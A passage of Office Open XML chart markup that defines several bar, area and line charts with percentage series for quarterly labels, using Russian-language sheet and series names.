            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-C66B-4511-A2A5-28C8F96EA86C}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="8EB6F8"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd" cmpd="sng">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="rnd" cmpd="sng">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000002-C66B-4511-A2A5-28C8F96EA86C}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-C66B-4511-A2A5-28C8F96EA86C}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.78</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-C66B-4511-A2A5-28C8F96EA86C}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="220"/>
        <c:overlap val="-100"/>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="441752512"/>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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="441752840"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="0%" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="441752512"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="700"/>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Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd">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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-AE07-4651-8BDF-FE8B1200E44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="8EB6F8"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd" cmpd="sng">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="rnd" cmpd="sng">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000002-AE07-4651-8BDF-FE8B1200E44F}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-AE07-4651-8BDF-FE8B1200E44F}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.78</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-AE07-4651-8BDF-FE8B1200E44F}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="220"/>
        <c:overlap val="-100"/>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="4417525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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="44175284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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752512"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="700"/>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Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd">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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-B35E-44CD-928A-D394A88B26A2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="8EB6F8"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd" cmpd="sng">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="rnd" cmpd="sng">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000002-B35E-44CD-928A-D394A88B26A2}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-B35E-44CD-928A-D394A88B26A2}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.78</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-B35E-44CD-928A-D394A88B26A2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Столбец1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E165A6"/>
            </a:solidFill>
            <a:ln w="381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ru-RU"/>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Лист1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$D$2:$D$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.52</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-B35E-44CD-928A-D394A88B26A2}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="500"/>
        <c:overlap val="-100"/>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="441752512"/>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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="441752840"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="l"/>
        <c:numFmt formatCode="0%" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="441752512"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="700"/>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Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.85</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.5</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-AED9-4D6B-8B61-09512820591B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd" cmpd="sng">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln w="38100" cap="rnd" cmpd="sng">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000002-AED9-4D6B-8B61-09512820591B}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln w="38100" cap="flat" cmpd="sng">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-AED9-4D6B-8B61-09512820591B}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.89</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.5</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.08</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000005-AED9-4D6B-8B61-09512820591B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$D$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Столбец1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E165A6"/>
            </a:solidFill>
            <a:ln w="38100">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$D$2:$D$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.52</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000006-AED9-4D6B-8B61-09512820591B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="441752512"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="4417528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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752512"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln>
      <a:noFill/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr sz="700"/>
      </a:pPr>
      <a:endParaRPr lang="ru-RU"/>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Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="22225" cap="rnd">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>Лист1!$A$2:$A$7</c:f>
              <c:strCache>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>Q1 2017</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Q1 2020</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$7</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="6"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.85</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.5</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-B591-4B88-85CA-EE1F8587699B}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="22225" cap="rnd" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dPt>
            <c:idx val="0"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
            <c:bubble3D val="0"/>
            <c:extLst>
